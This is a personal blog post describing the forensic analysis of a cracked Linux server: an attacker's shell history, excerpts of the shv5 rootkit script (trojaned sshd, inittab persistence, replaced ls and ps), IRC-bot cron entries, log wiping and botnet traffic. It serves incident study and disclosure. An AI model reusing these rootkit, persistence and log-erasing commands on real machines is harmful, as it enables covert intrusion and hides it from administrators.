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Welcome to Lars Strand
Saturday, 13 September 2008 @ 18:33 CEST
Holiday cracking

Update! 16. September 2007: I’ve posted a follow up on this story here.
A friend of mine asked me to have a look at his Linux-server. "It behaves strangely" he said, most notably the web-server apache refused to start. It turned out to be more than just a problem with apache.
I already had an account, so I started to poke around. The first thing I noticed was some strange ls behavior:
lars@server1:~$ ls ls: invalid option -- h Try `ls --help' for more information.
That’s odd.. Why don’t "ls" take "-h" all of a sudden?? I had aliased "ls, so I unaliased it and it worked fine:
lars@server1:~$ alias ls alias ls='ls -sh --color=auto' lars@server1:~$ unalias ls lars@server1:~$ ls backup lars@server1:~$
Strange. I’ll have too look into that later, but first get apache up and running:
lars@server1:~$ sudo /etc/init.d/apache2 start Password: * Starting apache 2.0 web server... (2): apache2: could not open error log file /var/log/apache2/error.log. Unable to open logs!
Ookay..? A quick peek into "/var/log/" revealed that "apache2/" was missing, but so was all other directories usually found under there as "mysql/", "exim4/", "samba/" and so on. Something was wrong alright. Did my friend accidentally delete everything by mistake?? He claimed not to. I logged in as root to fix the missing directories:
lars@server1:~$ sudo su - Password: root@server1:~# ls ls: unrecognized prefix: do ls: unparsable value for LS_COLORS environment variable total 44 4 . 4 .bashrc 4 .ssh 4 .. 4 .lesshst 8 .viminfo 8 .bash_history 4 .profile 4 .vimrc
Even more "ls" trouble? Again, "ls" is aliased:
root@server1:~# alias ls alias ls='ls -sa --color=auto' root@server1:~# unalias ls root@server1:~# ls root@server1:~#
By now, I really suspected that something was very very wrong. Misbehaving "ls" and missing a bunch of stuff under "/var/log/". My suspicion was confirmed when I examined root’s ".bash_history":
root@server1:~# cat -n .bash_history ... 340 w 341 cd /var 342 wget 343 tar -zxf shv5.tar.gz 344 rm -rf shv5.tar.gz 345 mv shv5 .x 346 cd .x 347 ./setup zibi.joe.149 54098 348 passwd 349 passwd 350 ps aux 351 crontab -l 352 cat /etc/issue 353 cat /etc/passwd 354 w 355 who 356 cd /usr/lib/libsh 357 ls 358 hide + 359 chmod +x hide 360 hide + 361 ./hide + 362 cd /var/.x 363 mkdir psotnic 364 cd psotnic 365 wget 366 tar -zxf psotnic0.2.5.tar.gz 367 rm -rf psotnic0.2.5.tar.gz 368 ls 369 mv psotnic-0.2.5-linux-static-ipv6 synscan 370 ./synscan 371 vi conf 372 vi conf1 373 mv synscan smbd 374 smbd -c conf 375 ls 376 ps aux 377 ls 378 ./smbd -c conf 379 ./smbd -c conf1 380 ./smbd conf 381 ./smbd conf1 382 ./smbd -a conf conf1 383 rm -rf conf.dec 384 rm -rf conf1.dec 385 cd /usr/lib/libsh 386 ./hide + 387 exit ... 425 ssh ftp@ 426 w 427 ls 428 ls 429 cd /var/.x 430 ls 431 cd psotnic/ 432 ls 433 rm -rf /var/log/* 434 exit 435 ls 436 cd /var/.x/psotnic/ 437 ls 438 vi conf2 439 ./smbd -c conf2 440 ./smbd conf2 441 ./smbd -a conf conf1 conf2 442 rm -rf conf2.dec 443 cd .. 444 ls 445 cd /usr/lib/libsh 446 hide + 447 ./hide + 448 exit 449 ps aux 450 cd /var/.x 451 ls 452 ls 453 cd psotnic/ 454 ls 455 cat pid.MastaH 456 kill -9 2030 457 ./synscan -a conf conf1 458 ./smbd -a conf conf1 459 cd /usr/lib/libsh 460 ./hide + ...
Woha! The box had been cracked alright! I found this quite exciting, but obviously, my friend did not. The attacker did one elementary error by not wiping out ".bash_history" – so this is probably not the only error he/she has done. Let’s start dissecting this little crack.
First. What is hiding under "/var/.x/" and what does the command "setup zibi.joe.149 54098" do?
root@server1:/var/.x# file setup setup: Bourne-Again shell script text executable root@server1:/var/.x# wc -l setup 825 setup root@server1:/var/.x# head -17 setup #!/bin/bash # # shv5-internal-release # by: PinT[x] April/2003 # # greetz to: # # [*] SH-members: BeSo_M, grass^, toolman, nobody, niceboy, armando99 # C00L|0, GolDenLord, Spike, zion ... # [*] Alba-Hack : 2Cool, heka, TheMind, ex-THG members ... # [*] SH-friends: mave, AlexTG, Cat|x, klex, JinkS ... # [*] tC-members: eksol, termid, hex, keyhook, maher, tripod etc.. # [*] And all others who diserve to be here but i forgot # [*] them at the moment ! # # PRIVATE ! DO NOT DISTRIBUTE *censored*EZ !
Now, this little shell script does all kinds of nasty stuff, like installing a modified ssh backdoor disguised as "/bin/ttyload" which is then added to "/etc/inittab" for automatic startup at boot:
mv $SSHDIR/sshd /sbin/ttyload chmod a+xr /sbin/ttyload chmod o-w /sbin/ttyload touch -acmr /bin/ls /sbin/ttyload chattr +isa /sbin/ttyload kill -9 `pidof ttyload` >/dev/null 2>&1 .... # INITTAB SHUFFLING chattr -isa /etc/inittab cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1 cat /etc/inittab |grep getty > /tmp/.init2 echo "# Loading standard ttys" >> /tmp/.init1 echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1
It also backdoor a bunch of standard linux commands:
# Backdoor ps/top/du/ls/netstat/etc.. cd $BASEDIR/bin BACKUP=/usr/lib/libsh/.backup mkdir $BACKUP ... # ls ... chattr -isa /bin/ls cp /bin/ls $BACKUP mv -f ls /bin/ls chattr +isa /bin/ls
This explains why "ls" misbehavied!
root@server1:/var/.x# ls -l /usr/lib/libsh/.backup/ total 552 -rwxr-xr-x 1 root root 126276 Dec 24 22:58 find -rwxr-xr-x 1 root root 59012 Dec 24 22:58 ifconfig -rwxr-xr-x 1 root root 77832 Dec 24 22:58 ls -rwxr-xr-x 1 root root 30388 Dec 24 22:58 md5sum -rwxr-xr-x 1 root root 99456 Dec 24 22:58 netstat -rwxr-xr-x 1 root root 65492 Dec 24 22:58 ps -rwxr-xr-x 1 root root 14016 Dec 24 22:58 pstree -rwxr-xr-x 1 root root 50180 Dec 24 22:58 top
Oh – and look at the timestamp. This was done at christmas!
Clearly the original "ls" and the newly installed "ls" are different, as md5 fingerprint and file shows:
root@server1:~# md5sum /usr/lib/libsh/.backup/ls /bin/ls eef7ca9dd6be1cc53bac84012f8d1675 /usr/lib/libsh/.backup/ls 0a07cf554c1a74ad974416f60916b78d /bin/ls root@server1:~# file /bin/ls /bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), for GNU/Linux 2.0.0, stripped root@server1:~# file /usr/lib/libsh/.backup/ls /usr/lib/libsh/.backup/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.0, dynamically linked (uses shared libs), for GNU/Linux 2.6.0, stripped
The backdoor toolkit ("sh5.tar.gz") was downloaded from (local copy here):
root@server1:~# dig +short -x
I can’t make much out of the site, since it’s in polish. The attacker probably don’t have any connection to this site – I don’t think he is that foolish, but then again – he has done several severe mistakes.
The output of the "setup" command, as run by the attacker, can be seen in the screen shot (I was running this on sandboxed server at home):
Okay, so "zibi.joe.149" is the password and "54098" is the port number. It’s running and (old) sshd from, as seen from the screen shot:
Nice colors.
The backdoor is installed. The next step is to install an irc-bot and make it an zombie. That is what "psotnic0.2.5.tar.gz" contains. The attacker extract and rename the irc-bot to "smbd", which happens to be the same as Samba’s daemons ("smbd" and "nbmd").
Next he creates two configuration files, which contains which irc-server to connect to, and which channel to join etc. The config files are then encrypted, and the clear-text ones are deleted:
371 vi conf 372 vi conf1 .... 378 ./smbd -c conf 379 ./smbd -c conf1 380 ./smbd conf 381 ./smbd conf1 382 ./smbd -a conf conf1
Let’s execute command 382 to see what it does:
root@server1:/var/.x/psotnic# ./smbd -a conf conf1 Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49) Copyright (C) 2003-2005 Grzegorz Rusin [+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1 [+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1 [+] Added 2 psotnics to cron
Aha! So it gets added to cron:
root@server1:/var/.x/psotnic# crontab -l */10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1 */10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1
At this time I killed off the two hostile smbd-processes and disabled the cron-job. I fired up a tcpdump in another shell and started the two processes manually:
root@server1:~# cd /var/.x/psotnic; ./smbd conf Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49) Copyright (C) 2003-2005 Grzegorz Rusin [*] Acting as LEAF [+] Config loaded [+] Going into background [pid: 5724] root@server1:/var/.x/psotnic# ./smbd conf1 Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49) Copyright (C) 2003-2005 Grzegorz Rusin [*] Acting as LEAF [+] Config loaded [+] Going into background [pid: 5727] root@server1:/var/.x/psotnic#
These two processes show up using (our backdoored) "ps", so I guess that why the attacker renamed it to "smbd":
root@server1:/var/.x/psotnic# ps axuw | grep smb root 3799 0.0 0.4 8592 2156 ? S 11:00 0:00 /usr/sbin/smbd -D root 3808 0.0 0.1 8592 896 ? S 11:00 0:00 /usr/sbin/smbd -D root 5724 0.0 0.1 1648 772 pts/2 S 12:47 0:00 ./smbd conf root 5727 0.0 0.1 1640 764 pts/2 S 12:47 0:00 ./smbd conf1
The first two are the real samba, the next two are the irc-bot. Let’s strace it to see what it does:
root@server1:~# strace -p 5727 ... connect(3, {sa_family=AF_INET, sin_port=htons(9714), sin_addr=inet_addr("")}, 16) = -1 EINPROGRESS (Operation now in progress) ... connect(4, {sa_family=AF_INET, sin_port=htons(6667), sin_addr=inet_addr("")}, 16) = -1 EINPROGRESS (Operation now in progress)
So it tries to connect to IP-address on port 9714 and on port 6667 (this port is used for irc-servers):
root@server1:~# dig +short -x root@server1:~# dig +short -x
Another polish host. The other IP-adress, "" is a CNAME for "", a well known irc-server here in Norway.
Using the tcpdump, I identified one network-stream to irc-server As these snippets show, they show the smbd connecting to "", and joining channel "#aik": 001 578PAB9NB :Welcome to the Internet Relay Network 578PAB9NB! 002 578PAB9NB :Your host is, running version 2.11.1p1 :578PAB9NB! JOIN :#aik 353 578PAB9NB @ #aik :578PAB9NB kknd raider brandyz jpi conf xerkoz IpaL vvo 366 578PAB9NB #aik :End of NAMES list. 352 578PAB9NB #aik ~op 578PAB9NB G :0 op - GTW 352 578PAB9NB #aik ~kknd kknd H :2 kknd - GTW 352 578PAB9NB #aik ~raider * raider G :4 raider - GTW 352 578PAB9NB #aik ~brandyz * brandyz G :4 brandyz - GTW 352 578PAB9NB #aik ~jpi *.jp jpi G :8 jpi - GTW 352 578PAB9NB #aik ~conf *.jp conf G :7 conf - GTW 352 578PAB9NB #aik ~xerkoz *.jp xerkoz H :7 xerkoz - GTW 352 578PAB9NB #aik lm *.at IpaL H :5 .LaPi.9@.IRCNet.. 352 578PAB9NB #aik ~vvo * vvo H :6 vvo - GTW 315 578PAB9NB #aik :End of WHO list.
This is just the raw network traffic of the irc-session joining channel #aik and listing all other members on that channel. I decided to join that channel myself (notice the nice underground nick: "viper42"). I was surprised not to be asked for any channel password. I guess our attacker made another bummer:
17:43 -!- viper42 [] has joined #aik 17:43 [Users #aik] 17:43 [ 578PAB9NL] [ conf] [ jpi ] [ raider ] [ vvo ] 17:43 [ brandyz ] [ IpaL] [ kknd] [ viper42] [ xerkoz] 17:43 -!- Irssi: #aik: Total of 10 nicks [0 ops, 0 halfops, 0 voices, 10 normal] 17:43 -!- Irssi: Join to #aik was synced in 1 secs
I found my friends server with the nick "578PAB9NB" and some other machines. These zombies are probably just waiting for the attacker to join the channel and give orders. Or perhaps the attacker already are lurking there. All have "* – GTW" at the end of their nick, except one:
17:45 [powertech] -!- IpaL [] 17:45 [powertech] -!- ircname : LaPi@IRCNet 17:45 [powertech] -!- channels : #relaks #ping @#seks #aik #pingwinaria #hattrick #trade #admin @#!sh 17:45 [powertech] -!- server : *.at [o o/ /o/]
This is the only nick that also have joined more than one channels. Guess I’ve found my attacker, unless this is a decoy. (Again: The attacker can’t be this stupid?!?) I guess I’ll just hang around for a few days just to see if anything interesting comes up. The hostname resolves to:
$ dig +short
And according to RIPE this IP-address belongs to Vienna University Computer Center. I asked them ( cert at aco net ) to take a closer look at the hostname in question and got an answer just hours later:
From: Alexander Talos via RT To: Subject: Cracker at ( [ACOnet CERT #38603] Date: Fri, 18 May 2007 18:22:43 +0200 (CEST) Reply-To: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hej! On Fri May 18 14:45:03 2007, wrote: > I have been tracking down cracker which connected from > ( The user, which Ouch. is a dormitory with about 4k rooms all behind a NAT gateway - it will be very hard to get hold of the miscreant. This incident will, in the long run, definitely help me getting rid of the NAT boxes in setups like that, but right now, we will have to make do with what we have. > Please investigate the host in question. Perhaps is this a > compromised host on your network acting as a jumpstation for Sure, and even in a NATed environment, this is still possible. Btw, you did a great job in analysing the compromised machine! I'll let you know when I have either further questions or any interesting results. Cheers, Alexander Talos - -- IT-Security, Universitaet Wien, ACOnet CERT <URL:> T:+43-1-4277-14351
No luck there I’m afraid..
Oh, – and I tried to log in using ssh (on port 54098) on all zombies listed here, but no ports where open. The other zombies are probably using other ports for the ssh backdoor.
The other identified network stream, destined to "" was garbled, so it’s time to fire up up strace again:
root@server1:/var/.x/psotnic# strace -f ./smbd conf1 &> /root/dump.strace
As expected, this creates a lot of output. Among other things, it tries to start the irc-client BitchX:
[pid 7537] execve("/bin/sh", ["sh", "-c", "BitchX -v 2> /dev/null"]
Which fails, since BitchX is not installed:
[pid 7537] write(2, "sh: ", 4) = 4 [pid 7537] write(2, "BitchX: not found", 17) = 17 [pid 7537] write(2, "n", 1) = 1 [pid 7537] close(2) = 0
You can see some of the traffic from tcpdump in the picture below:
This was just for one of the two smbd-processes. The other connected to the same polish site, and instead of "", it connected to "", an IRC-server located in Tromsø. The same zombies are at that channel as well – guess I’ll stick around there for a few days as well.
Also, what the cracker did, was to run a program called "hide" to clean entries from various log-files:
root@server1:/usr/lib/libsh# ./hide + Linux Hider v2.0 by mave enhanced by me! [+] [Shkupi Logcleaner] Removing + from the logs........ . [+] /var/log/messages ... [done] [+] /var/run/utmp ... [done] [+] /var/log/lastlog ... [done] [+] /var/log/wtmp ... [done] * m i s s i o n a c c o m p l i s h e d * p.h.e.e.r S.H.c.r.e.w server1:/usr/lib/libsh#
So why did the attacker then wipe out "/var/log/*"? Did he not trust this tool? Did he panicked?
So the box has been compromised, backdoor installed and it’s been converted to a zombie. The attacker made several mistakes allowing him to be detected:
- Forgot to wipe out root’s .bash_history.
- Wiped out everything under "/var/log/*", including directories which several programs relied on and thereby refusing to start. Now, why did he do that? This certainly was stupid.
- Changed the root-password. Another bummer. Never ever change the root-password. This surely will catch the attention of a sysadmin.
- Did not password-protect the IRC-channel where all his zombies resides. Not that it doesn’t matter much for us, since we would have sniffed that up as soon as the zombie tried to join the channel.
- Do the attacker still hang around the same channel as all his zombies does (the LaPi-guy)? If so he’s just begging to be exposed.
Severeal questions remains:
- Why was the command "ssh ftp@" entered? Did the attacker made a mistake in typing this command or did it serve some other purpose? The IP addres resolves to:
$ dig +short -x
- What kind of traffic goes to ( ?
- And the most important question is, how did he get access in the first time? The server was running Ubuntu 6.06 LTS (i386) and was fairly updated. The compromised could be caused by:
- An exploit unknown to the public.
- A user accessing this server from an already compromised host. The attacker could then sniff the the password.
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